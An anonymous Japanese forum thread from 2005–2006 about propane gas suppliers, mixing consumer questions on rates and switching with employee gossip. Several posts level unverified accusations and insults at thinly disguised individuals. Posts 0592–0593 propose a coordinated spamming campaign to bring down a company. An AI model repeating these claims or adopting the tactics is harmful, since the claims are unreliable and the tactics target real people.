05/03/08 04:53:010536名無電力14001
05/03/09 20:31:52一人は優秀な一流大学時代のお友達のお抱え探偵さん、もう一人は社員、秘密警察の割にはせこくてドケチな、宇宙的理論の代表殿下
0537名無電力14001
05/03/10 11:27:01全うな営業で客とられるなら仕方ないという気持ちにならざるを得ないが、
「親戚(甥っ子等)がニチガスに入社したから」って客に言わせるのはやめてくれ。
同一地区の互いに血縁関係の無い何人かの客に同じ事言われると勧誘員に対して殺意さえ覚えそうになってくるほど腹立たしくなってくるから。
正攻法で来いよ!
0539蜜異
05/03/12 18:04:33・ゼネで追い込みかけられ殿下に拾われ従順な犬を演じつつ秋B失脚計画を確実に実行していた災10氏
・元そごうの首切り隊長、コンプライアンスの名の下に今日も斬ります尭H氏
・屁理屈で今月も赤字埋めました。浣腸事業部なんざぁタルくてやれるかよ。あん。H羅氏
・秋B一派残党と思われ埼玉なんつーどうでもいいとこ(今更埼玉進出意味あるか?)にトバサレタ蜜E氏
・たいそうなリーマン根性もった策士。自分の為なら部下も差し出す根性。だけど他人には絶対悟られない名嘉N氏
・工事やってた頃のあなたは尊敬してたよ。ナルシスト根性は名前だけにしとけばよかった奈留S氏
・都合が悪いと無視。事なかれ主義の王道を突っ走る弱きを挫き強きに従う四歩S氏
・AFOH島解雇の後、苦労してると聞いてます。毒されないようにがんばって欲しいなとささやかなお願い。茨城視点チョ(ごめん名前忘れた)
0540社員
05/03/12 18:32:05・できるならオネェさんと一緒にタイムマシンで寒鎖室から過去に飛びたい。くるくるぱぴっちょ・ぱぺっぴぷー・モーグタン。
・貴方の色に染まります。だって私は純粋無垢なカメレオンリーマンなの。秋B氏の前での不動の正座が忘れられない。寒鎖室よりハァトをこめて鷹氏M氏
番外
本社の言い分
営業所しきってんのはオレらだから。あんなキタネェかっこして肉体労働だろ。頭脳はオレらで手足はあいつらね。
所長?課長?田舎モンの肉体労働者の頭ごときでフカシてんじゃねーよっと。
営業所の言い分
おめぇーらがエエカッコして1日中ねーちゃんかこってヘラヘラできんのもオレらあってなんだよ。
無駄口たたいてねぇーで少しは仕事しろや?いてこますどボケッ!
雲の上
いい感じですねぇ。これこそ大宇宙の原理原則!まさしく真価ー新化ー進化ー深化ですね。あはは。おおいにやりなさい。
↑まさしくありのままw
0541あいわわ
05/03/12 19:13:51器の小さいハッタリ男だった。
しかも「S社」の社長を名乗っていたから笑えるでしょ。
0542名無電力14001
05/03/13 02:06:48知っている人いたらおしえて!
↑口止め
0543名無電力14001
05/03/20 12:26:370544注目ーマジなレス
2005/03/22(火) 00:51:23糞スレ乱立だし、SとIのやりあいに見えるが、よーく見ると、Sの次はほとんどがIだべ。
大半のレスは私怨が煽り立ててるのが見え見え。しかも自演。
そんで、次は、UかYのスレ。時間見てもわかりやすすぎだべ。
漏れもLp業界長いから、私怨も予想はつくのさ。自己満足でしかないのがわからないか。
マジ、逮捕されるだろ。大体、Uは2chやる暇ねーべよ。他もこじつけで、苦しそうだべさ。
やっぱ、Lp業界の恥だな。(Yは五分五分ってとこか?)
これが、結論!最終結論決定!!「マジなレス」
0545名無電力14001
2005/03/29(火) 19:17:38ヤバイかな?それともニチガス入ったなら他の弱小プロパン業者に対しては無敵なんですか?
教えていただければ幸いです。
0546名無電力14001
2005/03/29(火) 19:27:49ちみは実に頭がいいな 体力と精力に絶対の自信が有るならニチガスがイチオシ!!
それと家庭崩壊と精神崩壊は自己責任だ!!
0547名無電力14001
2005/03/29(火) 19:40:50マジか…そうとうなヤバさなんですね。
人生破綻する前に気付いて良かったです。
ありがとうございました。ニチガスは遠慮する事にいたします。
0548名無電力14001
2005/03/29(火) 20:30:24で、どこにするんだ?候補があるなら全部言ってみな、マジレスでおせーてしんぜるからよ!
0551名無電力14001
2005/03/29(火) 20:58:380552名無電力14001
2005/03/29(火) 22:02:52忙しいなあ〜わははは
0553名無電力14001
2005/03/30(水) 23:26:21東京ガスもやめとき。
東京電力のオール電化攻勢が10年くらいは続きそうだから
プロパンをひっくり返しつつ電化をとめること考えなきゃならんようになる。
もっとも電化もソ○ータイマー的なものが働いてくる数年後には問題出てきそうだけど
0554名無電力14001
2005/03/31(木) 16:20:230555名無電力14001
2005/03/31(木) 17:52:55某大手家電メーカーの電化製品が保証期間過ぎると故障するって噂の事だべ。
0556名無電力14001
2005/03/31(木) 17:54:100557名無電力14001
2005/03/31(木) 22:38:50これから就職すんならプロパン屋なんてクズな業界選んじゃだめだよ
地方銀行や信用金庫もだめだぞ
東京ガスもろくなもんじゃないがおまいが死ぬまでは潰れることもないな
まずは公務員の試験合格しろよ
0558549 550
2005/04/08(金) 19:34:58ニチガスの内定を得つつ、より良い業界目指して就活頑張ります!
また報告にきます
0559名無電力14001
2005/04/10(日) 09:55:06http://society3.2ch.net/test/read.cgi/atom/1112693874/l50
アイエスガステム被害者の会
http://society3.2ch.net/test/read.cgi/atom/1104851248/l50
糞アイエスガステム(株)社内事情の真相
http://society3.2ch.net/test/read.cgi/atom/1109678976/l50
アイエスガステム株式会社はヴァカの集まり
http://society3.2ch.net/test/read.cgi/atom/1109435131/l50
アイエスガステム裏情報を語るスレPART−1
http://society3.2ch.net/test/read.cgi/atom/1108918782/l50
〜哀〜エス「カス」テム・社内報
http://society3.2ch.net/test/read.cgi/atom/1111861138/l50
元IS@現昭和GのH島みたくアホになる方法
http://society3.2ch.net/test/read.cgi/atom/1111417918/l50
[M異]はアイエスGの癌だ!
http://society3.2ch.net/test/read.cgi/atom/1111564943/l50
トータルエネルギーとISガステムって何物?!
http://society3.2ch.net/test/read.cgi/atom/1108993854/l50
0560558
2005/04/30(土) 20:40:42予定通り弐チガスの内定をゲットしたのですが、年の休みが60日位、
というビックリスケジュールだったので辞退することにしました。
忙しいプロパン業界乙
0561名無電力14001
2005/04/30(土) 23:31:24アホくさい
0562名無電力14001
2005/05/01(日) 21:42:070563名無電力14001
2005/05/01(日) 21:43:360564名無電力14001
2005/05/02(月) 17:20:082chばっかやってる自演の香具師が「アイ」にいるでしょうが!!(漏れもか?)
0565名無電力14001
2005/05/02(月) 18:37:42奴は血も涙もないパソコンおたく野郎です。絶対に許せませんこの恨み晴らす人いたら何でも協力
致します。是非連絡ください。
0566名無電力14001
2005/05/03(火) 01:26:15ナチガスに切り替え食らってお客に行った振りしてナチガスからこずかい受け取る
優秀な人がいぱーいおる会社
殿下の命令であっちこっちのスレに「結論 この会社は一流・・・」とレスしてる会社
そーいえば、そーいえば、昔・昔、ナチガスに切り替えまくられて一方的に戦争終了FAXを
流したが、ナチガスにプイッされてやられつずけてるカス会社
そんで俺等はリストラ
0567名無電力14001
2005/05/03(火) 02:21:12あんたがんがれよ。
0568名無電力14001
2005/05/03(火) 11:32:320569名無電力14001
2005/05/05(木) 19:57:01お騒がせいたしました
0570新卒
2005/05/06(金) 23:16:21なんかマジ事実ネタないですか?
0571○○銀行○○支店長
2005/05/10(火) 03:33:50真実を教えてください。ヨロピク!本当だったら結構、奴らバカだけど
頑張っているジャ〜ン
0572名無電力14001
2005/05/10(火) 06:05:19うそばっかり、そんなことありえない張ったり野郎は誰だ!
あっあいつだなデブ光が書いたんだな、自作自演けど違うか、ハイ島か?
0573名無電力14001
2005/05/13(金) 02:44:55http://school4.2ch.net/test/read.cgi/job/1112416021/87
0574事情通
2005/05/13(金) 20:39:140575名無電力14001
2005/05/14(土) 21:15:17こんどのニチガスさんはやるぞ!!5月は50周年だって!
慌てるやついないの
ばかだから潰れるまでわからないのか!
なんでもいいからかきこしろよ
0576名無電力14001
2005/05/15(日) 11:47:25マルチ氏ね
0577名無電力14001
2005/05/15(日) 21:40:49こんどのニチガスさんはやるぞ!!
↑ニチガスもガス屋だからばかやつらの類じゃねーの?
0578名無電力14001
2005/05/16(月) 19:31:140579名無電力14001
2005/05/21(土) 16:46:11藻前は静岡のあんなガス屋乗っ取って営業所でも出すつもりか!
悪い奴だな!
0580 ◆EpNRx4jy86
2005/05/21(土) 17:12:39てめーはどうしてそんなに馬鹿なんだ?
てめーが連日行ってるネカフェのオーナーはてめーが呼び捨てレスしてる人なんだよ!
馬鹿としか言いようがないな!!
0581名無電力14001
2005/05/22(日) 22:11:48リストラされて2chにしか当たれないみたいだから暖かく見守ってやりたいのが私の本心。
あっちこっちにコピペされてるけど・・・・・
↓ ↓
「ほれ、また我が社の糞社員が・・・」「ほら、また我が社の馬鹿な社員が・・・」っていう類の書き込みが
もしかして[アイ]の現4代目自らの書き込みだったら・・・と思えて仕方ないのは私だけだろうか。
それと繋がりとかははっきりとは解らないけど・・・・・
↓ ↓
「と同時に・・・」「結論 この会社は・・・」っていう書き込みがどうしても気になるんだよ。
他は愉快犯の煽り荒らし書き込みがあるよね。
必ず[アイ]と[エス]の板が同時に上がるからね。
私も[エス]→[アイ]→[リストラ]の私怨が[エス]の2代目の自作自演に必死にしてると思ってる。
0582調査機関
2005/05/25(水) 10:01:13ガス以外にも営業所所在地に様々な業態の店舗を構えてるからな。
0583マジレス
2005/06/03(金) 22:39:260584名無電力14001
2005/06/10(金) 19:13:470585名無電力14001
2005/06/10(金) 19:53:380586名無電力14001
2005/06/10(金) 20:34:27マジレスなら・・・・・
0587名無電力14001
2005/06/11(土) 04:02:210588名無電力14001
2005/06/12(日) 07:34:10逆に言えばエスの社長に一杯喰わされたって感じです。
今頃気が付いても遅すぎますよね。
0589名無電力14001
2005/06/13(月) 01:12:35最近山二ガスになった。
それってどうなの?山二って知ってる?
0590名無電力14001
2005/06/15(水) 07:02:57そんなに力があるのか?
0591まったく・・・
2005/06/16(木) 01:33:23丑汚とは合うか合わないかのどっちか
ただ合ったとしたら手強い事は間違いないな
あとY澤とはぶつかるだろうな
0592名無電力14001
2005/06/18(土) 23:20:20>今まで会社のために働いてきてこんな恥ずかしいのは初めてです。
>昔みたいに千葉=アイエスガステムと言われていた時代が懐かしいです。
>過ぎた過去をいつまでも考えていても仕方がないが、まさかこの年になってここまで待遇や環境が悪化するとは夢にも思わなかったです。
>本音ですが心の底から恥ずかしい限りです。
↑自演レス
どうやって、この会社を逝かせるかを討論しましょう。
悪口や愚痴では、進展がありません。建設的につぶしましょう。
皆さん、以下お願いします。
0593↑ ↑
2005/06/27(月) 01:38:55とりあえずageてみる。
誰かが↑を各スレにコピペしまくる。
必ず応戦してくる。
どさくさに紛れて他スレも上がる。
それに対してクソレスしてくるのを三日程見守る。
この板の住人でそのクソレスを放置プレイしないで弾圧しまくる。
こんな流れでどうか?
0594名無電力14001
2005/06/27(月) 03:26:02>593
激しく・同意!
0595名無電力14001
2005/07/02(土) 13:15:410596名無電力14001
2005/07/14(木) 01:03:22学生時代の糞アメフト部より仕事ってのは楽なものなのかい?
http://gakushuin-generals.com/ougaikai/50s/50s/article/1971.html
能力のない人間は昔も今も結果を残せない
そのくせレベルの低い人間しかいない低次元の会社では威張り腐っている
かっこ悪い男ですなw
賞罰委員会も取締役会も
失笑モノの演説をして学生にも笑われている遺椎や
社員の前で夫婦喧嘩をする際当、
夜中に社員を呼び出し金庫を開けさせて飲みにいく斧
のようなカスが偉そうな顔して自分のことは棚に上げて何か言ってるだけだろ
どの程度のものかたかが知れてますな
http://society3.2ch.net/test/read.cgi/atom/1118910197/l50
オイ、刑李扶持ョ鵜の斧
最近自分のことが話題にならないから寂しいのか?
それなら今度オマエのスレを立ててやろうか?
今夜も金庫から金出させて飲みにいってるのか?いい身分だな
ところでオマエが夜中に呼び出して金庫を開けさせたのは
販売二種にも落ちた会社の隣のマンションに住んでいる慰霊菖蒲だろ?
スポーツしかしたことのないお坊ちゃまの異例を
是値裸留石油からこのクソ会社に引っ張ってきて会社の隣に住まわせ
一年後に自分の直属の部下にしたのは
金庫を開けさせるためだったとはな
オマエもやることがせこい男だな
0597ザ・ゴールデンレス
2005/08/10(水) 00:36:31それをどう商売に結びつけるかやね。
やっぱりアンタ次第やねー。
敵ながらたいしたもんや。
問題はアンタのスピードに下がいつまでにマルチになれるかやでー。
5年以内に決めんと成長止まるでー。
そんなんも言われなくてもわかってるはずやろうな。
0598名無電力14001
2005/08/10(水) 01:49:15おまい、それ、マジレスか?
0599名無電力14001
2005/08/10(水) 20:31:09関東もんなんざ、関西もんに比べりゃかわいいもんよ。
ショーワの社長はんはビジネスでよく関西に来るんやが、その筋からの情報やから間違いないやろ。
0600名無電力14001
2005/08/11(木) 19:55:58 ̄ ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ (´´ んー
∧∧ ) (´⌒(´ んーんー
⊂(=^_^;⊂⌒`つ≡≡≡(´⌒;;;≡≡≡ んー
 ̄ ̄ (´⌒(´⌒;; んーーうっ(=^_^;=)
0601名無電力14001
2005/08/11(木) 21:44:47マジレスならあいつらはアルマゲドンだな
ガクガクブルブル
0602>597
2005/08/11(木) 23:28:020603名無電力14001
2005/08/13(土) 04:11:05漏れも調べてみたけど、大筋ネタではないようだ
敵ながらやってくれるよね
0604名無電力14001
2005/08/14(日) 01:04:22(^Д^)プギャー キャキャキャ
http://society3.2ch.net/test/read.cgi/atom/1123946308/l50
http://society3.2ch.net/test/read.cgi/atom/1123942526/l50
http://society3.2ch.net/test/read.cgi/atom/1123946308/l50
0605名無電力14001
2005/08/15(月) 21:20:22毎日の日課、スレチェック、乙w
0606名無電力14001
2005/08/19(金) 09:38:01http://society3.2ch.net/test/read.cgi/atom/1123946308/
0607名無電力14001
2005/08/20(土) 03:12:1522 23
ムキになってないよ!
何が正真正銘の柳沢だ!嘘つくな!
悪いですが、隣の芝生は真っ青でした。もう関わりたくありませんので
電話もしませんのであしからず!さよなら。せいぜいがんばってくださいよ丑さん。
↑ ↑
このバカなカキコは読んでるこっちが恥ずかしくなる、まさに失笑ものだな。
↑このカキコも含めてなぜあそこまでなにかといえば『丑』なる椰子に粘着してるのかわかったね。
もうかかわらない?電話もしない?
はぁ?どっちがどっちにかかわらないのか納得出来るカキコよろしく。
誰が誰に電話をもうしないのかも納得出来るカキコよろしく。
『柳沢』なる椰子?が電話してこい!とカキコしてるが電話してないのがよくわかる。
それなのに『丑』なる椰子に結び付けるのは低DQNの表れですな。
おそらく『丑』なる椰子は自らカキコしてないのでは。
隣の芝生は蒼かったなんてカキコしてるなら『柳沢』なる椰子に電話すればいいだけのこと。
『丑』なる椰子はこの流れには関係ないのがわかるわな。
アイザワ?きみが私怨なのもな。
いづれにしてもみっともないからもうやめれば。
0609名無電力14001
2005/08/23(火) 20:57:07激しく・同意!
0610名無電力14001
2005/09/12(月) 00:39:080611名無電力14001
2005/09/12(月) 15:40:07「原油価格上昇により仕入れ値高騰、企業努力じゃどうにもならないので値上げします」
と来たのですがガスって天然ガスが主原料じゃないんでしょうか?
家計のやり繰りで結構気を使っているのでどなたか詳しい内容が解る
HPなどありましたらご教授ください。宜しくお願いいたします。
0612名無電力14001
2005/09/13(火) 17:18:110613名無電力14001
2005/09/13(火) 23:00:38LPガスは原油を精製して作るものです
0614名無電力14001
2005/09/14(水) 19:09:57今のガス高すぎて最悪
0615名無電力14001
2005/09/14(水) 22:58:24いくら?
0616名無電力14001
2005/09/15(木) 01:17:01一人暮らし、料理なし+シャワーのみで月3500円位。
詳細は明細見当たらないので次の検針までワカラナイ。
たかくね?
0617名無電力14001
2005/09/20(火) 00:18:53検針値が分からないとなんともだけど、一人暮らしで
シャワーだけでその金額だと多少高いかもね。
住まいは集合住宅?ガス屋は個人商店?
そこらへんでも多少差が出るよ
0618名無電力14001
2005/09/20(火) 20:28:09プロパンガス業界の仕組みが知りたいのですがよくわからないんです。
八王子在住です。
現在、トータルエネルギーというプロパンやさんと契約しています。
最近トーエルサービスという会社がガス代が安くなるって言ってきました。
トーエルサービスに言わせるとトータルエネルギーは悪い会社だといってました。
どうでもいいので、安くなるんだったらと思い、トーエルサービスに変更したら、トータルエネルギーの人がきました。
トーエルサービスは怪しい会社だから契約しないほうがいい。
いまのまま契約を続けてもらえれば、トーエルサービスより安くする。といわれました。
とりあえず現在は、トータルエネルギーに契約しています。
でも、トーカイというところが集金しているのが不思議です。
この辺の事情に関して、教えてほしいのですが、助けていただけませんか?
とりあえず、ちょこっと自分が関係した流れは
ttp://blog.ramchan.com
で公開して、詳細がわかればさらに公開したいと思います。
スレ違いなら適切な場所へ誘導してください。
お願いします
0619名無電力14001
2005/09/20(火) 23:34:49http://society3.2ch.net/test/read.cgi/atom/1109874723/l50
豊田商事残党
http://society3.2ch.net/test/read.cgi/atom/1108993854/l50
右翼
http://society3.2ch.net/test/read.cgi/atom/1120554445/l50
薬物犯罪者
落ち目の芸能人
盛りを過ぎたプロレスラー
http://society3.2ch.net/test/read.cgi/atom/1118362601/l50
新聞勧誘員
健康器具販売員
布団販売員
ソーラー販売員
他社ガス拡張員
http://society3.2ch.net/test/read.cgi/atom/1114011029/l50
トータルエネルギー排除運動!
http://society3.2ch.net/test/read.cgi/soc/1119110902/
0620名無電力14001
2005/09/22(木) 21:08:51http://pie.bbspink.com/test/read.cgi/eromog2/1127390217/l50
0621名無電力14001
2005/09/29(木) 03:14:04年末位に500ドル越えるかなと思っていたら大誤算。
ほんとびっくりした。
こりゃ一斉値上げ間違いない!!!(*_*;
10月か11月に必ず値上げするぞ!!!
値上げしないガス屋の従業員どもは気をつけろ!能無経営者の奴隷生活続けてるのだぞ、絶対に半年以内には給料下がるぞ!!!
しかし、ガス屋のなかで9月に値上げに踏み切れたとこがあるなら、あくまで適正値上げ額が前提だが、そのガス屋の経営者の有能さは認めざるえない!!!
0622名無電力14001
2005/10/02(日) 17:22:0210月からの検針より、20円の値上げが決定しました。
客からは苦情三昧でしたよ。
値上げを決行した会社は他にもありますか?
0623名無電力14001
2005/10/02(日) 17:40:57値下げした所が9〜10月に再度値上げするのが情勢みたいです。
10月のCP505については、アメリカのハリケーンを考慮してもここまでの
上昇とはなかなか予想出来なかったと思います。4月に値下げしなかった所
も含めて、10月〜12月のCP次第では再度の値上げが考えられます。
CIF基準の原料費調整制度を適用していれば、値上げは来年の4月ごろかな?
値上げをしないからといって100%無能とはいえないですよ。
会社の規模・体力によっていろいろ違いますから。
でもこれからのCPの上昇傾向が続けばどこも値上げするしかないと
思います。
0624名無電力14001
2005/10/02(日) 17:43:151立方メートル10〜40円
です。
0625名無電力14001
2005/10/09(日) 02:27:320626名無電力14001
2005/10/09(日) 04:13:24使い物にならなかったひとばかりだから 残念
0627名無電力14001
2005/10/09(日) 05:42:460628名無電力14001
2005/10/09(日) 06:19:47でもさぁ、リアルにリストラとか給料ダウンとかしてないのって、S和Gだけじゃん。
現場で条件勝負に持ち込まれると勝ち目無しってとこ。
うちの会社も昔に比べたら半分ぐらいしか決済されないし。
俺は営業だけど、配送なんて悲惨なもんだよ。
給料、約半分になってるし。
年数が経てばS和も変わったんだよ。
自転車とかして逮捕された逆の人も居るし。やっと決心したんじゃないかな。
打たれ強いっていうか、まぁ、努力したんだろうな。
昔のイメージを変えるには時間がかかると思われるが。
0629名無電力14001
2005/10/10(月) 23:17:1810月からとは早いね、
でも大手も年内には値上げするから、いいんじゃないの。
0630名無電力14001
2005/10/24(月) 23:55:46値下げしないとガスを替えると言えば下げてくれますよ!
ただし、この時期で15m3/月以上使用している方!
それ以下は論外。
0631名無電力14001
2005/11/03(木) 23:34:12車目立ってるぞ。
0632名無電力14001
2005/11/04(金) 07:00:3747:名無電力14001:2005/11/04(金) 00:18:03
おんだまり
身返信野郎
早く会社案内作れ
4年越しだぞ
つまらないうんこヴォケはさっさと氏ねよぉぉぉ
0633名無電力14001
2005/11/04(金) 19:02:19意味分からん。
そんなお客は、もう客じゃない多分切り捨てされるでしょう。
もう、そろそろそう言う時期にはいっると思います。
木を見て森を見ず。
0634名無電力14001
2005/11/05(土) 23:51:03ごね得。
0635名無電力14001
2005/11/16(水) 07:34:50河原実業ってガス屋のですよね?
実はここの皆さんに相談なのですがそこで働いている八○支店のT.Yさんにこないだ暴力を受けました。
勝手に営業に来て上がりこんで帰ってくれといったら引っ付きかかってきて頬にアザができました。
この場合どうしたらよいんでしょうか?
誰か助けてください。
0636名無電力14001
2005/11/21(月) 13:00:030637名無電力14001
2005/11/21(月) 13:32:37早く、警察に行けよ。
それとも、自分自身で会社に乗り込んだら、反対に警察呼ばれたりして。
0638CP10V
2005/11/26(土) 01:02:040639名無電力14001
2005/11/26(土) 11:00:010640名無電力14001
2005/12/04(日) 01:38:410642名無電力14001
2005/12/15(木) 03:55:34ガスパルのどっかの支店が行政処分されたの知ってますか?
詳しいエロイ人オセーテ 木盆ぬ
0643名無電力14001
2005/12/15(木) 18:59:420644名無電力14001
2005/12/15(木) 19:17:02これ↓ではないかな?
ttp://www.sekiyukagaku.co.jp/pbn2005-11-14.htm
『保安院、全農に改善命令』
ちなみに漏れはエロい人ではないw
良い子は、ググることを覚えましょうね。
ttp://www.google.co.jp/search?num=100&hl=ja&newwindow=1&q=JA+%E3%83%97%E3%83%AD%E3%83%91%E3%83%B3+%22%E8%A1%8C%E6%94%BF%E5%87%A6%E5%88%86%22&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja
0645名無電力14001
2006/01/04(水) 21:02:390646都市ガス
2006/01/05(木) 21:03:25最近調べたら150m先に東京ガスの枝管発見
近所は全部で8戸築17年
都市ガスに代えてもプロパン屋さんは
元を取ってるよね
円満解決しますかね?
0647名無電力14001
2006/01/05(木) 22:39:27親会社絡みでやられた会社連中が
チクッたんでしょ。
気持ちは理解できる。
0648名無電力14001
2006/01/09(月) 10:18:31その前に東京ガスが150m延長工事してくれるかが問題。
>最近調べたら150m先に東京ガスの枝管発見
しかし、どうやって調べたの?
0649名無電力14001
2006/01/09(月) 10:23:08農家相手に勝手にガスつけて増やしただけだし。
客商売出来る会社体質じゃないでしょ。
自社でやるからってことで、LPG協会にも入ってないし講習会とかもやってるんだかやってないんだか
法律も守ってないから、多分やってないんだろうね。
供給開始時の書面の交付をしてないって言うのは・・・怖いもん知らずというか・・・
農協って言えば、自動車保険とかで対応が悪いことでも有名だな。
農協自体が、もう必要ないんじゃないの?
0650回答です
2006/01/09(月) 22:19:11不動産屋仲介の中古物件
契約時、都市ガスの配管の地図を
くれました
ガス給湯器を変えるつもりなので
リフォーム開始の2月までに都市ガスかプロパンの
返事をしなければなりません。
アドバイスあったら、よろしく
0651名無電力14001
2006/01/10(火) 16:56:44築17年ということから感考えると、既設のガス配管を今の業者がやったにしても
減価償却年数は過ぎていると考えられる。
ただ、一般的にメーターまでの配管(供給管)を都市ガス側が仮に150m引いてくれたとしても
メーター以降の配管(消費設備)に関しては、全て顧客の負担になるという決まりがあります。
恐らく、メーター以降の屋内配管などは全てやり直す必要に迫られると思います。
都市ガスの宅地内引き込み費用は一般的に20万円程度と聞いています。
都市ガスの指定業者でないと、ガス給湯器などの工事はしてはいけないことになっているので
これもLPGの給湯器をつけた場合に比べてに比べて割高になると思います。
定価30万円前後のオートタイプ追炊付給湯器を都市ガス業者につけてもらうと
本体20万円に値引きして工事費で敵を討たれた話も聞きますね。全部で40万円とか(^^ゞ
都市ガス引き込みに20万円+オートタイプ給湯器で40万円では電気温水器が買えますね。
良いLPG業者をつかまえられれば、オートタイプの追炊付給湯器を無償で取り付けてもらえて
ガス料金も交渉出来ると思います。
これも、タラレバで仮定の話ではありますが・・・(^◇^;)
どちらにしても、不動産屋さんに都市ガスでやった場合の見積もりをもらって
どれくらいかかるのか、正確に把握することも必要だと思います。
都市ガス=LPより良いもの と思いがちですが、全く使っている側からは違いのわからないものですから。
強いて言えば、LPG 24.000Kcal 都市ガス 13A 13.000Kcalと同量燃やして
カロリーはLPGの方が倍あります。(使っててそんなにわかんないけど(^◇^;))
自分で、良さそうなLPガス屋に声かけて
「お宅からガス取ってあげたいんですが、給湯器工事とか無料とかの特典はないですか」とか
なかなか聞けないかなぁ(^◇^;)
敷地内引き込みに20万円もかかるって言われたんで、私は都市ガスやめました。
なんか、説明に来た市役所の人が偉そうだったし(^^ゞ
0652名無電力14001
2006/01/10(火) 19:43:430653ダイオキシン
2006/01/10(火) 22:27:25ありがとう
今度の日曜に不動産屋とリフォームの打ち合わせがあるので
聞いてみます、リフォームは不動産屋の工事部で割りやすいとなっています
では、また報告します
>>651
ありがとう検討します
0654失礼
2006/01/10(火) 22:29:55>>651→652
ありがとう検討します
0655名無電力14001
2006/02/08(水) 20:37:38値下げできなきゃ他に変えるとか。
相場よりかなり高いみたいなんだけど。
大家とか不動産屋とグルになってる可能性もあるのかな?
0656名無電力14001
2006/02/09(木) 00:42:36交渉する価値はあるかも
集合配管をほかに変えるのは大変かもだけど‥
グルってのはないと思うんだけど‥
逆に大家さんに相談してガス屋に交渉してもらうってのはどうかな?
0657名無電力14001
2006/02/12(日) 21:14:301?あたり¥184 基本料金なし 賃貸アパートに住んでます。
消費者を馬鹿にしてますね。
0658名無電力14001
2006/02/13(月) 00:30:191? ¥184 って 1m3¥184ってこと?
そんな料金でアパートに供給しないよ、
まして基本料金なしなんてありえない。
今時、業務用にだってそんな料金じゃ売らないよ。
0659名無電力14001
2006/02/13(月) 14:55:530660名無電力14001
2006/02/14(火) 17:13:02情報をしっかり書け。
1m3 184円は業務用でも安い料金。
1m3 584円なら、多少は同情してあげられるが。
そのままだと、657が暴言吐いてるだけにみえるがw
安すぎる。
0661名無電力14001
2006/02/14(火) 18:29:08アメリカ寄りの産油国が、日本から金を吸い上げる戦略に気づかずに馬鹿なことをした”つけ”を日本国民が払っているだけ。
原価計算しなかった頭の弱い元売を含むガス屋が、自分の首を絞めただけ。
景気がよくなれば、価格を意識しない環境になるが、諦めましょう。
値段だけが一人歩き。この板もその一つ。
インターネットの負の部分といえます。
0662名無電力14001
2006/02/14(火) 18:31:250663名無電力14001
2006/02/17(金) 08:27:010664名無電力14001
2006/03/09(木) 13:23:08基本料1800円
0〜7 m3 435円
7〜20 m3 415円
20〜 m3 385円
という、これからすむ賃貸マンションのプロパン料金は
やはり高いみたいですね…
埼玉のサ○サンガス…
さっき料金聞きに電話したら、料金の話になったとたん
コールセンターのお姉さんが申し訳なさそ〜な口調に。
今は石油の価格が高いので…すぐ値下げしますから…
本当に値下げしてくれるのだろうか…。
賃貸マンションのプロパン料金を安くするためにはどんな方法があるのでしょうか。
大家さんに交渉してくれるように相談するとかでしょうか。
新築マンションのため、工事費とかがより上乗せされているんでしょうか。
貧乏生活の敵だよ…
0665名無電力14001
2006/03/09(木) 16:09:03マルチ止めれ!!!!!!!!!!!
0666名無電力14001
2006/03/09(木) 17:48:40石油情報センター
http://oil-info.ieej.or.jp/cgi-bin/topframemake.cgi?ParaSession=OWF7-2
0667664
2006/03/11(土) 23:02:47ありがとうございます!
調べてみたら、周辺では平均より高いけれども
最高値ほど高いわけでもない、という値段でした。
高いけれども不当な値段というわけでもないということがわかりましたので、
プロパン節約生活に勤しみたいと思います。
毎日湯船に浸からなければ生きていけなさそうですが、
使い終わるたびに元栓締めるとか何とかします。
0668名無電力14001
2006/03/13(月) 22:50:270669名無電力14001
2006/03/15(水) 22:28:55仕入先が違うだけで、商品に差がないのに安売りをするからだ。
ニチガス、TOKAI、ミツウロコ、イワタニの上場企業が潰れるしかないよ。
0670名無電力14001
2006/04/02(日) 03:29:11滞納していた店子が逃げたから、プロパンガス屋にいわれるがままに
そいつの滞納分も払ったんだけど、(電気水道は払わなくてよかった)
ちなみに私は大家で(前の店子が勝手にシャワーやキッチンをとりつけた)
まあ便利だからそのまま使わせてもらっているんだけど
他のプロパンと比べて高い気が…
0671名無電力14001
2006/04/03(月) 02:15:49借家を借りる時は保証人を付ける訳だから 請求は そちらに行くのが普通でしょう。あなたはガス屋にバカにされてるんじゃないか
そんなガス屋なら他の店に切り替えすれば いいんじゃないの 血相変えて来るから強気にでれば
0672名無電力14001
2006/04/03(月) 18:49:08具体的にいくらかかりますか?
100万かかるといわれたけど本当に?
0673名無電力14001
2006/04/03(月) 22:54:18だからニチガスの社長が代わったんだwww
0674名無電力14001
2006/04/03(月) 23:25:15明細はもらった? どんなに高く見積もってもそれはありえない。
どこに聞いたか知らないけど、いま、ガスを使っている販売店なら
なにがそうなるのか小一時間、説明してもらえ。
0675名無電力14001
2006/04/05(水) 00:31:28レスありがと
他のプロパンに変えるといったら
シャワーの 給湯器をうちで無償でつけたんだから工事代がかかる
納分を払ったほうが安くすむといわれて…
じつは後半年で取り壊し予定で夏にはガスとめちゃえと思ってて
後4ヶ月だしまあいいか
0676名無電力14001
2006/04/05(水) 00:48:42契約したのは あくまでも借主でしょうし 無償貸し付けしたと 言うなら 外しつ 持って行ってもらえばいいんだよ
あんまり うるさい事を言うなら県の商工労政事務所に相談してみな 面白い事になるかもしれないから
0677名無電力14001
2006/04/05(水) 16:47:00店子がかわいそう…。
0678名無電力14001
2006/04/09(日) 00:15:2310m3/6,000〜7,000円が殆どだからやりやすいよwww
0679名無電力14001
2006/04/10(月) 16:44:18「高いから供給元変更を大家さんに相談する」って電話したら
「会って話したい」ってしつこく電話してきます。
会う場合は理論武装しといた方が良いですよね。
どこか参考になるサイトありませんか?
0680名無電力14001
2006/04/13(木) 23:50:28会社にばらすぞ。
0681名無電力14001
2006/04/26(水) 22:16:04我が家も埼玉件で
1800円プラス500円弱m3で請求が来たのですがその後交渉はどうなりましたか?
0682名無電力14001
2006/04/27(木) 07:08:33立法500円て高いよな。
0683名無電力14001
2006/04/27(木) 07:18:18三月は12・6立法使用で、6835円でした。
これって普通?高い?
賃貸住まいです。
0684名無電力14001
2006/04/27(木) 08:30:24普通、どちらかと言えば安い。
0685681
2006/04/27(木) 12:10:500686名無電力14001
2006/04/28(金) 13:53:050687679
2006/04/29(土) 01:28:40大家の家に最新の全自動風呂等が無料で入っていてガスも安いらしい。
不動産屋も巻き込んで大家を説得してガス屋と交渉させた結果、
500円→430円に(基本料金は変わらず)。
まだぼったくられていると思いますが、これ以上交渉の余地は無いそうです。
